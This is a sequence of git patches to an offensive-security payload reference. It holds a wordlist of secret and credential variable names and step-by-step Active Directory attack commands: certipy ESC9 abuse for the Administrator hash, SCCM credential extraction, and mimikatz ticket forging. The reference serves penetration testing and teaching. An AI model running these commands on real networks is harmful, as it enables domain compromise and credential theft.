+MH_PASSWORD= +MH_APIKEY= +LINUX_SIGNING_KEY= +API_SECRET= +-Dsonar.organization= +-Dsonar.login= +cdscasc= +YO0= +YEi8xQ= +FIREFOX_CLIENT= +0YhXFyQ= +preferred_username= +iss= +PERCY_TOKEN= +PERCY_PROJECT= +FILE_PASSWORD= +-DSELION_BROWSER_RUN_HEADLESS= +SSHPASS= +GITHUB_REPO= +ARTIFACTORY_USERNAME= +ARTIFACTORY_KEY= +query= +encrypted_05e49db982f1_key= +encrypted_05e49db982f1_iv= +PLUGIN_USERNAME= +PLUGIN_PASSWORD= +NODE_ENV= +IRC_NOTIFICATION_CHANNEL= +DATABASE_USER= +DATABASE_PORT= +DATABASE_NAME= +DATABASE_HOST= +CLOUDFLARE_ZONE_ID= +CLOUDFLARE_AUTH_KEY= +CLOUDFLARE_AUTH_EMAIL= +AWSCN_SECRET_ACCESS_KEY= +AWSCN_ACCESS_KEY_ID= +1LRQzo6ZDqs9V9RCMaGIy2t4bN3PAgMWdEJDoU1zhuy2V2AgeQGFzG4eanpYZQqAp6poV02DjegvkXC7cA5QrIcGZKdrIXLQk4TBXx2ZVigDio5gYLyrY= +zendesk-travis-github= +token_core_java= +TCfbCZ9FRMJJ8JnKgOpbUW7QfvDDnuL4YOPHGcGb6mG413PZdflFdGgfcneEyLhYI8SdlU= +CENSYS_UID= +CENSYS_SECRET= +AVbcnrfDmp7k= +test= +encrypted_5d5868ca2cc9_key= +encrypted_5d5868ca2cc9_iv= +encrypted_573c42e37d8c_key= +encrypted_573c42e37d8c_iv= +encrypted_45b137b9b756_key= +encrypted_45b137b9b756_iv= +encrypted_12ffb1b96b75_key= +encrypted_12ffb1b96b75_iv= +c6cBVFdks= +VU8GYF3BglCxGAxrMW9OFpuHCkQ= +PYPI_PASSOWRD= +NPM_USERNAME= +NPM_PASSWORD= +mMmMSl1qNxqsumNhBlmca4g= +encrypted_8b6f3baac841_key= +encrypted_8b6f3baac841_iv= +encrypted_4d8e3db26b81_key= +encrypted_4d8e3db26b81_iv= +SGcUKGqyoqKnUg= +OMISE_PUBKEY= +OMISE_KEY= +KXOlTsN3VogDop92M= +GREN_GITHUB_TOKEN= +DRIVER_NAME= +CLOUDFLARE_EMAIL= +CLOUDFLARE_CREVIERA_ZONE_ID= +CLOUDFLARE_API_KEY= +rI= +pHCbGBA8L7a4Q4zZihD3HA= +nexusUsername= +nexusPassword= +mRFSU97HNZZVSvAlRxyYP4Xxx1qXKfRXBtqnwVJqLvK6JTpIlh4WH28ko= +encrypted_fee8b359a955_key= +encrypted_fee8b359a955_iv= +encrypted_6d56d8fe847c_key= +encrypted_6d56d8fe847c_iv= +aX5xTOsQFzwacdLtlNkKJ3K64= +TEST_TEST= +TESCO_API_KEY= +RELEASE_TOKEN= +NUGET_KEY= +NON_TOKEN= +GIT_COMMITTER_NAME= +GIT_AUTHOR_NAME= +CN_SECRET_ACCESS_KEY= +CN_ACCESS_KEY_ID= +0VIRUSTOTAL_APIKEY= +0PUSHOVER_USER= +0PUSHOVER_TOKEN= +0HB_CODESIGN_KEY_PASS= +0HB_CODESIGN_GPG_PASS= +0GITHUB_TOKEN= +nexusUrl= +jxoGfiQqqgvHtv4fLzI= +gpg.passphrase= +encrypted_b1fa8a2faacf_key= +encrypted_b1fa8a2faacf_iv= +encrypted_98ed7a1d9a8c_key= +encrypted_98ed7a1d9a8c_iv= +VIP_GITHUB_DEPLOY_KEY_PASS= +TEAM_EMAIL= +SACLOUD_API= +SACLOUD_ACCESS_TOKEN_SECRET= +SACLOUD_ACCESS_TOKEN= +PANTHEON_SITE= +LEANPLUM_KEY= +LEANPLUM_APP_ID= +FIREBASE_KEY= +CONVERSATION_URL= +BLhLRKwsTLnPm8= +B2_BUCKET= +B2_APP_KEY= +B2_ACCT_ID= +-Dgpg.passphrase= +YT_CLIENT_SECRET= +YT_CLIENT_ID= +WVNmZ40V1Lt0DYC2c6lzWwiJZFsQIXIRzJcubcwqKRoMelkbmKHdeIk= +TRV= +TEST_GITHUB_TOKEN= +RANDRMUSICAPIACCESSTOKEN= +NQc8MDWYiWa1UUKW1cqms= +MY_SECRET_ENV= +FDfLgJkS3bKAdAU24AS5X8lmHUJB94= +COVERALLS_SERVICE_NAME= +CONSUMERKEY= +CLU_REPO_URL= +--closure_entry_point= +gradle.publish.secret= +gradle.publish.key= +ggFqFEKCd54gCDasePLTztHeC4oL104iaQ= +encrypted_12c8071d2874_key= +encrypted_12c8071d2874_iv= +encrypted_0fba6045d9b0_key= +encrypted_0fba6045d9b0_iv= +dv3U5tLUZ0= +UAusaB5ogMoO8l2b773MzgQeSmrLbExr9BWLeqEfjC2hFgdgHLaQ= +PASS= +MONGOLAB_URI= +GITHUB_TOKENS= +FLASK_SECRET_KEY= +DB_PW= +CC_TEST_REPOTER_ID= +8FWcu69WE6wYKKyLyHB4LZHg= +zfp2yZ8aP9FHSy5ahNjqys4FtubOWLk= +rBezlxWRroeeKcM2DQqiEVLsTDSyNZV9kVAjwfLTvM= +hpmifLs= +fR457Xg1zJIz2VcTD5kgSGAPfPlrYx2xnR5yILYiaWiLqQ1rhFKQZ0rwOZ8Oiqk8nPXkSyXABr9B8PhCFJGGKJIqDI39Qe6XCXAN3GMH2zVuUDfgZCtdQ8KtM1Qg71IR4g= +encrypted_932b98f5328a_key= +encrypted_932b98f5328a_iv= +encrypted_31d215dc2481_key= +encrypted_31d215dc2481_iv= +encrypted_1db1f58ddbaf_key= +encrypted_1db1f58ddbaf_iv= +WATSON_CONVERSATION_WORKSPACE= +WATSON_CONVERSATION_USERNAME= +WATSON_CONVERSATION_PASSWORD= +SOUNDCLOUD_USERNAME= +SOUNDCLOUD_PASSWORD= +SOUNDCLOUD_CLIENT_SECRET= +SOUNDCLOUD_CLIENT_ID= +SDM4= +PARSE_JS_KEY= +PARSE_APP_ID= +NON_MULTI_WORKSPACE_SID= +NON_MULTI_WORKFLOW_SID= +NON_MULTI_DISCONNECT_SID= +NON_MULTI_CONNECT_SID= +NON_MULTI_BOB_SID= +NON_MULTI_ALICE_SID= +MULTI_WORKSPACE_SID= +MULTI_WORKFLOW_SID= +MULTI_DISCONNECT_SID= +MULTI_CONNECT_SID= +MULTI_BOB_SID= +MULTI_ALICE_SID= +GHB_TOKEN= +GCR_USERNAME= +GCR_PASSWORD= +BROWSERSTACK_USE_AUTOMATE= +AUTH_TOKEN= +0NC6O0ThWq69BcWmrtbD2ev0UDivbG8OQ1ZsSDm9UqVA= +&query= +xsixFHrha3gzEAwa1hkOw6kvzR4z9dx0XmpvORuo1h4Ag0LCxAR70ZueGyStqpaXoFmTWB1z0WWwooAd0kgDwMDSOcH60Pv4mew= +username= +ted_517c5824cb79_iv= +s3_secret_key= +s3_access_key= +n8awpV01A2rKtErnlJWVzeDK5WfLBaXUvOoc= +encrypted_f383df87f69c_key= +encrypted_f383df87f69c_iv= +encrypted_997071d05769_key= +encrypted_997071d05769_iv= +encrypted_671b00c64785_key= +encrypted_671b00c64785_iv= +encrypted_3761ed62f3dc_key= +encrypted_3761ed62f3dc_iv= +branch= +_8382f1c42598_iv= +_02ddd67d5586_key= +YANGSHUN_GH_PASSWORD= +Y8= +XJ7lElT4Jt9HnUw= +VIP_TEST= +USE_SSH= +SOMEVAR= +PROD_USERNAME= +PROD_PASSWORD= +ORG_GRADLE_PROJECT_cloudinary.url= +N= +LOGNAME= +I6SEeHdMJwAvqM6bNXQaMJwJLyZHdAYK9DQnY= +HAB_KEY= +HAB_AUTH_TOKEN= +GPG_EXECUTABLE= +GK_LOCK_DEFAULT_BRANCH= +GIT_USER= +F97qcq0kCCUAlLjAoyJg= +DB_USERNAME= +DB_PASSWORD= +DB_DATABASE= +DB_CONNECTION= +CONEKTA_APIKEY= +CLAIMR_DB= +BROWSERSTACK_BUILD= +AiYPFLTRxoiZJ9j0bdHjGOffCMvotZhtc9xv0VXVijGdHiIM= +ANALYTICS= +A= +?account= +6mSMEHIauvkenQGZlBzkLYycWctGml9tRnIpbqJwv0xdrkTslVwDQU5IEJNZiTlJ2tYl8og= +1ewh8kzxY= +0KNAME= +-e= +&password= \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 8d4e0b0..ea0b85d 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -81,6 +81,7 @@ - [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2) - [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control) - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) + - [ESC9 - No Security Extension](#esc9---no-security-extension) - [Certifried CVE-2022-26923](#certifried-cve-2022-26923) - [Pass-The-Certificate](#pass-the-certificate) - [UnPAC The Hash](#unpac-the-hash) @@ -257,6 +258,8 @@ Use the correct collector * Collect more data for certificates exploitation using Certipy ```ps1 certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound + certipy find 'corp.local/john:Passw0rd@dc.corp.local' -old-bloodhound + certipy find 'corp.local/john:Passw0rd@dc.corp.local' -vulnerable -hide-admins -username user@domain -password Password123 ``` Then import the zip/json files into the Neo4J database and query them. @@ -2459,6 +2462,45 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 certipy relay -ca 172.16.19.100 ``` + +#### ESC9 - No Security Extension + +Requirements: +* `StrongCertificateBindingEnforcement` set to `1` (default) or `0` +* Certificate contains the `CT_FLAG_NO_SECURITY_EXTENSION` flag in the `msPKI-Enrollment-Flag` value +* Certificate specifies `Any Client` authentication EKU +* `GenericWrite` over any account A to compromise any account B + +**Scenario** + +John@corp.local has **GenericWrite** over Jane@corp.local, and we want to compromise Administrator@corp.local. +Jane@corp.local is allowed to enroll in the certificate template ESC9 that specifies the **CT_FLAG_NO_SECURITY_EXTENSION** flag in the **msPKI-Enrollment-Flag** value. + +* Obtain the hash of Jane with Shadow Credentials (using our GenericWrite) + ```ps1 + certipy shadow auto -username John@corp.local -p Passw0rd -account Jane + ``` +* Change the **userPrincipalName** of Jane to be Administrator. :warning: leave the `@corp.local` part + ```ps1 + certipy account update -username John@corp.local -password Passw0rd -user Jane -upn Administrator + ``` +* Request the vulnerable certificate template ESC9 from Jane's account. + ```ps1 + certipy req -username jane@corp.local -hashes ... -ca corp-DC-CA -template ESC9 + # userPrincipalName in the certificate is Administrator + # the issued certificate contains no "object SID" + ``` +* Restore userPrincipalName of Jane to Jane@corp.local. + ```ps1 + certipy account update -username John@corp.local -password Passw0rd -user Jane@corp.local + ``` +* Authenticate with the certificate and receive the NT hash of the Administrator@corp.local user. + ```ps1 + certipy auth -pfx administrator.pfx -domain corp.local + # Add -domain to your command line since there is no domain specified in the certificate. + ``` + + #### Certifried CVE-2022-26923 > An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege. diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index bbf93c7..8246a95 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -1504,3 +1504,4 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com * [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1) * [Abusing SeLoadDriverPrivilege for privilege escalation - 14 - JUN - 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/) * [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/) +* [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - March 17, 2022 | Simon Zuckerbraun](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) \ No newline at end of file diff --git a/README.md b/README.md index b5bdf8b..8e3b2f7 100644 --- a/README.md +++ b/README.md @@ -1,11 +1,15 @@ -# Payloads All The Things [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/) +# Payloads All The Things A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! I :heart: pull requests :) -You can also contribute with a :beers: IRL, or using the sponsor button. +You can also contribute with a :beers: IRL, or using the sponsor button +[![Sponsor](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&link=https://github.com/sponsors/swisskyrepo)](https://github.com/sponsors/swisskyrepo) +[![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/) + +An alternative display version is available at https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/.

@@ -58,4 +62,13 @@ Be sure to read [CONTRIBUTING.md](https://github.com/swisskyrepo/PayloadsAllTheT

-Thanks again for your contribution! :heart: \ No newline at end of file +Thanks again for your contribution! :heart: + + +🧙‍♂️ Sponsors +----- + +This project is proudly sponsored by these companies. + +[](https://github.com/vaadata) +[](https://github.com/projectdiscovery) diff --git a/YOUTUBE.md b/YOUTUBE.md index 1b5b6f9..853f44c 100644 --- a/YOUTUBE.md +++ b/YOUTUBE.md @@ -11,7 +11,6 @@ - [OJ Reeves](https://www.youtube.com/channel/UCz2aqRQWMhJ4wcJq3XneqRg) - [Hacksplained - A Beginner Friendly Guide to Hacking](https://www.youtube.com/c/hacksplained) - [STÖK](https://www.youtube.com/c/STOKfredrik) -- [Defcon](https://www.youtube.com/user/DEFCONConference) - [Hackersploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q) - [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw) - [Nahamsec](https://www.youtube.com/c/Nahamsec) @@ -26,4 +25,7 @@ - [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc) - [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8) - [The Conscience of a Hacker](https://www.youtube.com/watch?v=0tEnnvZbYek) -- [Defcon 2020 Talks](https://www.youtube.com/user/DEFCONConference/videos) +- [Defcon Conference](https://www.youtube.com/user/DEFCONConference/videos) +- [x33fcon Conference](https://www.youtube.com/c/x33fcon) +- [Hack In Paris](https://www.youtube.com/user/hackinparis) +- [LeHack / HZV](https://www.youtube.com/user/hzvprod) \ No newline at end of file From 4bc5f724b2cb42ae8d8b7ee4ccbd6c88eaad2d8d Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 3 Sep 2022 16:17:23 +0200 Subject: [PATCH 24/69] Moving learning resources into a specific folder --- README.md | 4 ++-- BOOKS.md => _LEARNING_AND_SOCIALS/BOOKS.md | 0 TWITTER.md => _LEARNING_AND_SOCIALS/TWITTER.md | 0 YOUTUBE.md => _LEARNING_AND_SOCIALS/YOUTUBE.md | 0 4 files changed, 2 insertions(+), 2 deletions(-) rename BOOKS.md => _LEARNING_AND_SOCIALS/BOOKS.md (100%) rename TWITTER.md => _LEARNING_AND_SOCIALS/TWITTER.md (100%) rename YOUTUBE.md => _LEARNING_AND_SOCIALS/YOUTUBE.md (100%) diff --git a/README.md b/README.md index 8e3b2f7..9a79b30 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ # Payloads All The Things A list of useful payloads and bypasses for Web Application Security. -Feel free to improve with your payloads and techniques ! +Feel free to improve with your payloads and techniques ! I :heart: pull requests :) You can also contribute with a :beers: IRL, or using the sponsor button @@ -49,7 +49,7 @@ You might also like the `Methodology and Resources` folder : - [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits) -You want more ? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/BOOKS.md) and [Youtube videos](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/YOUTUBE.md) selections. +You want more ? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/_LEARNING_AND_SOCIALS/BOOKS.md) and [Youtube videos](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/_LEARNING_AND_SOCIALS/YOUTUBE.md) selections. 👨‍💻 Contributions diff --git a/BOOKS.md b/_LEARNING_AND_SOCIALS/BOOKS.md similarity index 100% rename from BOOKS.md rename to _LEARNING_AND_SOCIALS/BOOKS.md diff --git a/TWITTER.md b/_LEARNING_AND_SOCIALS/TWITTER.md similarity index 100% rename from TWITTER.md rename to _LEARNING_AND_SOCIALS/TWITTER.md diff --git a/YOUTUBE.md b/_LEARNING_AND_SOCIALS/YOUTUBE.md similarity index 100% rename from YOUTUBE.md rename to _LEARNING_AND_SOCIALS/YOUTUBE.md From fae02107dfee29bfeea9a2da337b3225deb8c931 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 4 Sep 2022 14:24:16 +0200 Subject: [PATCH 25/69] Jetty RCE Credits --- Methodology and Resources/Windows - Privilege Escalation.md | 5 +++-- Upload Insecure Files/README.md | 5 +++-- 2 files changed, 6 insertions(+), 4 deletions(-) diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 8246a95..70e1c81 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -1502,6 +1502,7 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com * [Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw, Project Zero - Wednesday, April 18, 2018](https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html) * [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/) * [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1) -* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 - JUN - 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/) +* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 JUN 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/) * [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/) -* [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - March 17, 2022 | Simon Zuckerbraun](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) \ No newline at end of file +* [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - March 17, 2022 | Simon Zuckerbraun](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) +* [Bypassing AppLocker by abusing HashInfo - 2022-08-19 - Ian](https://shells.systems/post-bypassing-applocker-by-abusing-hashinfo/) \ No newline at end of file diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 585939a..b193d72 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -189,7 +189,7 @@ When a ZIP/archive file is automatically decompressed after the upload ### Jetty RCE Upload the XML file to `$JETTY_BASE/webapps/` -* [JettyShell.xml](https://raw.githubusercontent.com/Mike-n1/tips/main/JettyShell.xml) +* [JettyShell.xml - From Mikhail Klyuchnikov](https://raw.githubusercontent.com/Mike-n1/tips/main/JettyShell.xml) ## References @@ -203,4 +203,5 @@ Upload the XML file to `$JETTY_BASE/webapps/` * [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap) * [Arbitrary File Upload Tricks In Java - pyn3rd](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) * [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload) -* [Injection points in popular image formats - Daniel Kalinowski‌‌ - Nov 8, 2019](https://blog.isec.pl/injection-points-in-popular-image-formats/) \ No newline at end of file +* [Injection points in popular image formats - Daniel Kalinowski‌‌ - Nov 8, 2019](https://blog.isec.pl/injection-points-in-popular-image-formats/) +* [A tip for getting RCE in Jetty apps with just one XML file! - Aug 4, 2022 - PT SWARM / @ptswarm](https://twitter.com/ptswarm/status/1555184661751648256/) \ No newline at end of file From 9e2471a472faba1cdf654588762a6ca63e9f36fe Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 4 Sep 2022 20:51:23 +0200 Subject: [PATCH 26/69] SCCM Network Account --- .../Active Directory Attack.md | 27 ++++++++++++++++++- 1 file changed, 26 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index ea0b85d..f46dfd2 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -113,6 +113,7 @@ - [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049) - [PrivExchange attack](#privexchange-attack) - [SCCM Deployment](#sccm-deployment) + - [SCCM Network Access Accounts](#sccm-network-access-accounts) - [WSUS Deployment](#wsus-deployment) - [RODC - Read Only Domain Controller Compromise](#rodc---read-only-domain-controller-compromise) - [PXE Boot image attack](#pxe-boot-image-attack) @@ -3521,7 +3522,7 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th MalSCCM.exe inspect /server: /groups ``` * Compromise management server, use locate to find primary server -* use Inspect on primary server to view who you can target +* Use `inspect` on primary server to view who you can target ```ps1 MalSCCM.exe inspect /all MalSCCM.exe inspect /computers @@ -3560,6 +3561,28 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th MalSCCM.exe group /delete /groupname:TargetGroup ``` + +### SCCM Network Access Accounts + +> If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials. + +* Find SCCM blob + ```ps1 + Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount" + NetworkAccessPassword : + NetworkAccessUsername : + ``` +* Using [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) for SCCM retrieval and decryption + ```ps1 + .\SharpDPAPI.exe SCCM + ``` +* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`: + ```ps1 + Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl + ConvertFrom-SddlString "" + ``` + + ### WSUS Deployment > Windows Server Update Services (WSUS) enables information technology administrators to deploy the latest Microsoft product updates. You can use WSUS to fully manage the distribution of updates that are released through Microsoft Update to computers on your network @@ -3929,3 +3952,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/) * [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) * [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials) +* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/) +* [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9) \ No newline at end of file From 2be739ea4fc6aa9e2d3b4177b35eb4d16e4ebfb2 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 6 Sep 2022 10:03:49 +0200 Subject: [PATCH 27/69] Fixing TGS/ST --- .../Active Directory Attack.md | 20 +++++++++---------- .../Windows - Privilege Escalation.md | 6 +++--- Type Juggling/README.md | 20 +++++++++++-------- 3 files changed, 25 insertions(+), 21 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index f46dfd2..fab2467 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -721,7 +721,7 @@ Requirements: #### samAccountName spoofing -> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a TGS to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid TGS for the domain controller. +> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a ST to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid ST for the domain controller. **Requirements** @@ -1670,7 +1670,7 @@ Mitigations: ### Pass-the-Ticket Silver Tickets -Forging a TGS require machine account password (key) or NTLM hash of the service account. +Forging a Service Ticket (ST) require machine account password (key) or NT hash of the service account. ```powershell # Create a ticket for the service @@ -1707,7 +1707,7 @@ Mitigations: > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names) -Any valid domain user can request a kerberos ticket (TGS) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as. +Any valid domain user can request a kerberos ticket (ST) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as. * [GetUserSPNs](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py) from Impacket Suite @@ -2650,10 +2650,10 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi # Get a TGT using the newly acquired certificate via PKINIT proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR - # Get a TGS for the target account + # Get a ST (service ticket) for the target account proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v - # Utilize the TGS for future activity + # Utilize the ST for future activity export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab ``` @@ -2751,7 +2751,7 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr * using bloodyAD: `bloodyAD.py --host [DC IP] -d DOMAIN -u hacker -p MyPassword123 addObjectToGroup UserToAdd 'GROUP NAME'` -* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a TGS, then grab its hash and kerberoast it. +* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a Service Ticket (ST), then grab its hash and kerberoast it. ```powershell # Check for interesting permissions on accounts: Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} @@ -3117,14 +3117,14 @@ mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... / mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi ``` -#### Use the Trust Ticket file to get a TGS for the targeted service +#### Use the Trust Ticket file to get a ST for the targeted service ```powershell .\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local .\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi 